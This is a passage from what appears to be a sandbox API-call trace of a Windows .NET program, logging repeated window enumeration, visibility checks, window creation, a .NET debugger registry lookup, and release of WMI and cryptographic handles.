[0234.590] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.590] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.590] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.590] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.590] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.591] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.591] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.591] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.591] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x44c [0234.591] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.591] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.591] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.591] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.591] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.591] GetWindowThreadProcessId (in: hWnd=0x60154, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.592] GetWindowThreadProcessId (in: hWnd=0x20140, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.592] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.592] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.592] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.592] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.592] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.592] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.592] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.592] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.592] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.593] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.593] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.593] EnumWindows (lpEnumFunc=0x4c60a86, lParam=0x0) returned 1 [0234.593] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.593] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.593] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.593] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.593] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.593] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.594] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.594] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.595] GetWindowThreadProcessId (in: hWnd=0x5014c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.595] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.595] GetWindowThreadProcessId (in: hWnd=0x300c2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.596] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.596] GetWindowThreadProcessId (in: hWnd=0x20146, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.596] GetWindowThreadProcessId (in: hWnd=0x40022, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.596] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.596] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.596] GetWindowThreadProcessId (in: hWnd=0x2010c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.596] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.596] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.596] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.596] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.596] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.597] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.597] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.597] GetWindowThreadProcessId (in: hWnd=0x300a2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.597] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x564 [0234.597] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.597] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x538 [0234.597] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.597] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x504 [0234.597] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.597] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.598] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.598] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.598] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.598] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.598] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.598] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.598] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.598] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x44c [0234.598] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.598] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.599] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.599] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.599] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.599] GetWindowThreadProcessId (in: hWnd=0x60154, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.599] GetWindowThreadProcessId (in: hWnd=0x20140, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.599] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x540 [0234.599] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x75c [0234.599] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x600 [0234.599] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.599] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0234.600] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x56c [0234.600] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.600] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5cc [0234.600] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4dc [0234.600] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.600] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5fc [0234.600] EnumWindows (lpEnumFunc=0x4c60aae, lParam=0x0) [0234.600] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.600] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.601] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x64c [0234.601] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.601] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0234.602] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5c4 [0234.602] GetWindowThreadProcessId (in: hWnd=0x5014c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x60c [0234.602] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.602] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x300c2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4b0 [0234.603] GetWindowThreadProcessId (in: hWnd=0x20146, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.603] GetWindowThreadProcessId (in: hWnd=0x40022, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.603] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7f8 [0234.604] GetWindow (hWnd=0x20146, uCmd=0x4) returned 0x0 [0234.604] IsWindowVisible (hWnd=0x20146) returned 0 [0234.604] IsWindowVisible (hWnd=0x40022) returned 0 [0234.604] IsWindowVisible (hWnd=0x2013e) returned 0 [0234.605] IsWindowVisible (hWnd=0x20152) returned 0 [0234.606] IsWindowVisible (hWnd=0x2001c) returned 0 [0234.606] IsWindowVisible (hWnd=0x10052) returned 0 [0234.606] IsWindowVisible (hWnd=0x20020) returned 0 [0234.606] IsWindowVisible (hWnd=0x300a2) returned 0 [0234.606] IsWindowVisible (hWnd=0x200d0) returned 0 [0234.607] IsWindowVisible (hWnd=0x200d6) returned 0 [0234.607] IsWindowVisible (hWnd=0x200e0) returned 0 [0234.607] IsWindowVisible (hWnd=0x10050) returned 1 [0234.607] GetWindowTextLengthW (hWnd=0x10050) returned 0 [0234.608] GetWindowTextW (in: hWnd=0x10050, lpString=0x18a15c, nMaxCount=16 | out: lpString="") returned 0 [0234.609] IsWindowVisible (hWnd=0x3003e) returned 0 [0234.609] IsWindowVisible (hWnd=0x2010c) returned 0 [0234.609] IsWindowVisible (hWnd=0x20108) returned 0 [0235.169] GetCurrentProcess () returned 0xffffffff [0235.169] GetCurrentThread () returned 0xfffffffe [0235.169] GetCurrentProcess () returned 0xffffffff [0235.169] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x18a2f0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18a2f0*=0x4f8) returned 1 [0235.169] GetCurrentThreadId () returned 0x7f0 [0235.169] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x75520000 [0235.170] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0235.170] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.5c39d4_r27_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x10158 [0235.170] SetWindowLongW (hWnd=0x10158, nIndex=-4, dwNewLong=2009343453) returned 80131942 [0235.170] GetWindowLongW (hWnd=0x10158, nIndex=-4) returned 2009343453 [0235.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x18995c | out: phkResult=0x18995c*=0x514) returned 0x0 [0235.170] RegQueryValueExW (in: hKey=0x514, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x18997c, lpData=0x0, lpcbData=0x189978*=0x0 | out: lpType=0x18997c*=0x0, lpData=0x0, lpcbData=0x189978*=0x0) returned 0x2 [0235.170] RegQueryValueExW (in: hKey=0x514, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x18997c, lpData=0x0, lpcbData=0x189978*=0x0 | out: lpType=0x18997c*=0x0, lpData=0x0, lpcbData=0x189978*=0x0) returned 0x2 [0235.170] RegCloseKey (hKey=0x514) returned 0x0 [0235.171] SetWindowLongW (hWnd=0x10158, nIndex=-4, dwNewLong=80132062) returned 2009343453 [0235.171] GetWindowLongW (hWnd=0x10158, nIndex=-4) returned 80132062 [0235.171] GetWindowLongW (hWnd=0x10158, nIndex=-16) returned 113311744 [0235.171] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10158, Msg=0x24, wParam=0x0, lParam=0x189c34) returned 0x0 [0235.171] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10158, Msg=0x81, wParam=0x0, lParam=0x189c28) returned 0x1 [0235.171] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10158, Msg=0x83, wParam=0x0, lParam=0x189c14) returned 0x0 [0235.171] CallWindowProcW (lpPrevWndFunc=0x77c425dd, hWnd=0x10158, Msg=0x1, wParam=0x0, lParam=0x189c28) returned 0x0 [0235.171] GetClientRect (in: hWnd=0x10158, lpRect=0x189990 | out: lpRect=0x189990) returned 1 [0235.171] GetWindowRect (in: hWnd=0x10158, lpRect=0x189990 | out: lpRect=0x189990) returned 1 [0235.171] GetParent (hWnd=0x10158) returned 0x0 [0235.171] OleInitialize (pvReserved=0x0) returned 0x80010106 [0235.172] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x18a26c | out: lplpMessageFilter=0x18a26c*=0x0) returned 0x80004021 [0235.172] PeekMessageW (in: lpMsg=0x18a240, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18a240) returned 0 [0235.172] PeekMessageW (in: lpMsg=0x18a240, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18a240) returned 0 [0235.172] WaitMessage () Thread: id = 161 os_tid = 0x728 Thread: id = 162 os_tid = 0x598 [0217.729] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0236.588] CoGetContextToken (in: pToken=0x46ffc30 | out: pToken=0x46ffc30) returned 0x0 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] WbemLocator:IUnknown:Release (This=0x5b20a00) returned 0x1 [0236.588] WbemLocator:IUnknown:Release (This=0x5b20a00) returned 0x0 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] IUnknown:Release (This=0x5b2d2e0) returned 0x2 [0236.588] IUnknown:Release (This=0x5b2d2e0) returned 0x1 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] WbemLocator:IUnknown:Release (This=0x5b2d230) returned 0x1 [0236.588] WbemLocator:IUnknown:Release (This=0x5b2d230) returned 0x0 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] IUnknown:Release (This=0x5b333e0) returned 0x2 [0236.588] IUnknown:Release (This=0x5b333e0) returned 0x1 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] WbemLocator:IUnknown:Release (This=0x5b331e8) returned 0x1 [0236.588] WbemLocator:IUnknown:Release (This=0x5b331e8) returned 0x0 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] IUnknown:Release (This=0x5b35bd8) returned 0x2 [0236.588] IUnknown:Release (This=0x5b35bd8) returned 0x1 [0236.588] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0236.588] WbemLocator:IUnknown:Release (This=0x5b3baf8) returned 0x1 [0236.588] WbemLocator:IUnknown:Release (This=0x5b3baf8) returned 0x0 [0236.589] CoGetContextToken (in: pToken=0x46ffa50 | out: pToken=0x46ffa50) returned 0x0 [0236.589] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x1 [0236.589] IUnknown:Release (This=0x5b3bb94) returned 0x0 [0236.620] LocalFree (hMem=0x800968) returned 0x0 [0236.621] GdipDisposeImage (image=0x6342230) returned 0x0 [0236.646] IUnknown:Release (This=0x5b35bd8) returned 0x0 [0236.647] CoGetContextToken (in: pToken=0x46ffa50 | out: pToken=0x46ffa50) returned 0x0 [0236.647] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x1 [0236.647] IUnknown:Release (This=0x5b333a4) returned 0x0 [0236.648] IUnknown:Release (This=0x5b333e0) returned 0x0 [0236.649] CoGetContextToken (in: pToken=0x46ffa50 | out: pToken=0x46ffa50) returned 0x0 [0236.649] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x1 [0236.649] IUnknown:Release (This=0x5b332dc) returned 0x0 [0236.650] IUnknown:Release (This=0x5b2d2e0) returned 0x0 [0236.650] CoGetContextToken (in: pToken=0x46ffa50 | out: pToken=0x46ffa50) returned 0x0 [0236.650] WbemLocator:IUnknown:Release (This=0x7a0f7c) returned 0x1 [0236.650] IUnknown:Release (This=0x5b2c934) returned 0x0 [0236.651] CryptDestroyKey (hKey=0x4b74f10) returned 1 [0236.651] CryptReleaseContext (hProv=0x773398, dwFlags=0x0) returned 1 [0236.652] CryptReleaseContext (hProv=0x773398, dwFlags=0x0) returned 1 [0236.652] CryptDestroyKey (hKey=0x4b816f0) returned 1 [0236.652] CryptReleaseContext (hProv=0x7740e0, dwFlags=0x0) returned 1 [0236.652] CryptDestroyKey (hKey=0x4b74e90) returned 1 [0236.652] CryptReleaseContext (hProv=0x773310, dwFlags=0x0) returned 1 [0236.652] CryptReleaseContext (hProv=0x773310, dwFlags=0x0) returned 1 [0236.652] CryptReleaseContext (hProv=0x7740e0, dwFlags=0x0) returned 1 [0236.653] CryptDestroyKey (hKey=0x4b74e10) returned 1 [0236.653] CryptReleaseContext (hProv=0x773288, dwFlags=0x0) returned 1 [0236.653] CryptReleaseContext (hProv=0x773288, dwFlags=0x0) returned 1 [0236.653] CloseHandle (hObject=0x36c) returned 1 [0236.654] CryptDestroyKey (hKey=0x4b74d90) returned 1 [0236.654] CryptReleaseContext (hProv=0x773200, dwFlags=0x0) returned 1 [0236.654] CryptReleaseContext (hProv=0x773200, dwFlags=0x0) returned 1 [0236.654] CryptDestroyKey (hKey=0x4b74d10) returned 1 [0236.654] CryptReleaseContext (hProv=0x773178, dwFlags=0x0) returned 1 [0236.654] CryptReleaseContext (hProv=0x773178, dwFlags=0x0) returned 1 [0236.655] CryptDestroyKey (hKey=0x4b81670) returned 1 [0236.655] CryptReleaseContext (hProv=0x774058, dwFlags=0x0) returned 1 [0236.655] CryptDestroyKey (hKey=0x4b74c90) returned 1 [0236.655] CryptReleaseContext (hProv=0x7730f0, dwFlags=0x0) returned 1 [0236.655] CryptReleaseContext (hProv=0x7730f0, dwFlags=0x0) returned 1 [0236.655] CryptReleaseContext (hProv=0x774058, 